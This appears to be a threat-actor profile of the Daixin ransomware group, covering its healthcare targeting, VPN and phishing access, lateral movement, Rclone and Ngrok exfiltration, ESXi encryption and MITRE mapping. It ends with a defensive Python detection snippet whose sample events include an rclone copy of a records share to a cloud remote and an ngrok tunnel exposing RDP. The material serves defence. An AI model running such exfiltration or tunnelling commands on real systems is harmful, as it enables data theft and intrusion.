
Daixin Ransomware – Threat Actor

February 10, 2025
in Threat Actors

Daixin Ransomware

Other Names

Daixin Team

Date of Initial Activity

2022

Location

Unknown

Suspected Attribution

Ransomware Group

Motivation

Data Theft
Financial Gain

Software

Windows
Database

Overview

The Daixin ransomware group is a financially motivated cybercrime organization that has rapidly emerged as a significant threat since its inception in June 2022. Known for its sophisticated tactics and targeted attacks, Daixin has predominantly focused on sectors with critical operational dependencies, most notably the US Healthcare and Public Health (HPH) sector. This group’s activities have led to the compromise of electronic health records (EHRs), personally identifiable information (PII), patient health information (PHI), and the disruption of essential healthcare services. By leveraging double extortion techniques, Daixin encrypts critical files while threatening to release stolen data, placing immense pressure on victims to comply with their demands.

Although healthcare has been a primary target, Daixin has demonstrated its ability to attack diverse industries. Notable incidents include the 2022 breach of Malaysia’s AirAsia Group, which exposed the personal data of over five million passengers and employees, and the 2023 compromise of B&G Foods, a multibillion-dollar conglomerate. In both cases, the victims refused to pay the ransom, prompting Daixin to publicly release sensitive data on its leak site. These attacks underscore the group’s capacity to cause widespread operational and reputational harm.

Daixin’s technical sophistication is another hallmark of its operations. The group typically gains initial access to networks through vulnerabilities in virtual private network (VPN) servers or by exploiting weak credentials obtained via phishing campaigns. Once inside, Daixin uses advanced lateral movement techniques to infiltrate systems and exfiltrate sensitive data. Its encryption methods, based on the Babuk Locker strain, target critical systems, including VMware ESXi servers, rendering virtual machines and databases inoperable. These multi-layered attack strategies make Daixin a formidable adversary for cybersecurity teams.

Common targets

Health Care and Social Assistance

Transportation and Warehousing – United States

Malaysia

Attack Vectors

Software Vulnerabilities

Remote Desktop Protocol (RDP)

How they operate

Initial access is a cornerstone of Daixin’s strategy. The group predominantly targets virtual private network (VPN) servers, exploiting misconfigurations and vulnerabilities to penetrate enterprise defenses. In cases where software flaws are unavailable, they turn to phishing campaigns aimed at extracting login credentials from unsuspecting employees. By compromising VPN access points, Daixin bypasses perimeter defenses and establishes a foothold in the victim’s environment, from which they stage their multi-pronged attack.

Once inside the network, Daixin focuses on reconnaissance and lateral movement. The group conducts a thorough exploration of the compromised environment, using advanced tools to harvest credentials and map the internal network. Stolen credentials often facilitate lateral movement via Secure Shell (SSH) and Remote Desktop Protocol (RDP), enabling Daixin to navigate through critical systems. Their choice of utilities, including Rclone for cloud storage management and Ngrok for establishing reverse proxies, underscores their technical acumen in exfiltrating data while avoiding detection.

Data encryption and exfiltration represent the final stages of Daixin’s attack lifecycle. Leveraging a ransomware module based on the Babuk Locker strain, they encrypt files using the ChaCha8 algorithm, rendering them inaccessible to victims. For larger files, Daixin employs segmented encryption techniques to optimize performance while ensuring file integrity is irreversibly compromised. They also target VMware ESXi servers, resetting administrative credentials and encrypting virtual machine files, further crippling victim operations. Stolen data is then used as leverage in double-extortion schemes, where organizations are pressured to pay ransom demands under the threat of public exposure.

The Daixin ransomware group exemplifies the evolving complexity of modern ransomware campaigns. Their blend of technical sophistication and psychological manipulation poses significant challenges to organizations and cybersecurity teams. By understanding their operational methods, enterprises can better prepare to defend against this persistent threat, emphasizing proactive measures such as patch management, credential security, and network segmentation.

MITRE Tactics and Techniques

1. Initial Access
Technique: Exploit Public-Facing Application (T1190). Daixin Team exploits vulnerabilities in virtual private network (VPN) servers to gain initial access to target networks.
Technique: Phishing (T1566). They use phishing campaigns to harvest VPN credentials from employees of targeted organizations.
2. Execution
Technique: Command and Scripting Interpreter (T1059). The group uses scripts and commands for deploying ransomware and lateral movement.
3. Persistence
Technique: Valid Accounts (T1078). Stolen credentials allow Daixin Team to maintain access to compromised networks.
4. Privilege Escalation
Technique: Valid Accounts (T1078). Leveraging stolen credentials with elevated privileges for further actions within the network.
5. Defense Evasion
Technique: Obfuscated Files or Information (T1027). The group employs obfuscation techniques to bypass detection mechanisms.
Technique: Indicator Removal on Host (T1070). They delete logs or other traces of their activities to avoid detection.
6. Credential Access
Technique: Credential Dumping (T1003). Daixin extracts credentials stored within systems to facilitate lateral movement.
7. Discovery
Technique: System Network Configuration Discovery (T1016). Conducts reconnaissance to map out the target network and identify key systems.
Technique: Remote System Discovery (T1018). Identifies accessible systems for lateral movement.
8. Lateral Movement
Technique: Remote Services (T1021). Uses protocols like SSH and RDP for lateral movement within the network.
9. Collection
Technique: Data from Information Repositories (T1213). Targets databases and shared drives containing sensitive information.
10. Exfiltration
Technique: Exfiltration Over Alternative Protocol (T1048). Utilizes tools like Rclone and Ngrok to transfer stolen data to external servers.
11. Impact
Technique: Data Encrypted for Impact (T1486). Deploys ransomware to encrypt critical files and systems, including VMware ESXi servers.
Technique: Service Stop (T1489). Terminates services to facilitate encryption of files in use.
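As an added illustration of the T1048 detection logic this mapping implies (example code written for this page, not from the original article or any vendor), the Python snippet below scans constructed process-creation events for the Rclone and Ngrok usage patterns named above. The event fields, hostnames and command lines are assumed sample data; matching on the binary name alone misses renamed copies, so in practice this is paired with egress baselining.

```python
import re

# Constructed process-creation events (not from any real incident). The
# fields mirror what an EDR or Sysmon Event ID 1 record would carry.
SAMPLE_EVENTS = [
    {"host": "fs01", "user": "svc_backup", "image": "C:\\Tools\\rclone.exe",
     "cmd": 'rclone.exe copy "D:\\Shares\\Records" cloud:staging --transfers 16'},
    {"host": "db02", "user": "itadmin", "image": "C:\\Users\\Public\\ngrok.exe",
     "cmd": "ngrok.exe tcp 3389"},
    {"host": "ws17", "user": "jdoe", "image": "C:\\Windows\\notepad.exe",
     "cmd": "notepad.exe notes.txt"},
    {"host": "fs01", "user": "svc_backup", "image": "C:\\Tools\\rclone.exe",
     "cmd": "rclone.exe version"},
]

# rclone transfer verb followed by a local source and a "remote:" destination
RCLONE_XFER = re.compile(r"\b(copy|sync|move)\b\s+\S+\s+([A-Za-z0-9_-]+):", re.I)
# ngrok tunnel verb followed by the local port being exposed
NGROK_TUNNEL = re.compile(r"\b(tcp|http|tls)\b\s+(\d+)", re.I)


def classify(event):
    """Return (technique_id, reason) for a Daixin-style exfiltration or
    tunnelling pattern, or None when the event is benign."""
    image = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmd = event["cmd"]
    if image.startswith("rclone"):
        m = RCLONE_XFER.search(cmd)
        if m:  # "rclone version" and similar admin usage do not match
            return ("T1048", f"rclone {m.group(1)} to remote '{m.group(2)}:'")
    if image.startswith("ngrok"):
        m = NGROK_TUNNEL.search(cmd)
        if m:
            port = int(m.group(2))
            svc = {3389: "RDP", 22: "SSH"}.get(port, f"port {port}")
            return ("T1048", f"ngrok {m.group(1)} tunnel exposing {svc}")
    return None


def detect(events):
    """Return (host, user, technique_id, reason) for every matching event."""
    findings = []
    for e in events:
        hit = classify(e)
        if hit:
            findings.append((e["host"], e["user"], *hit))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```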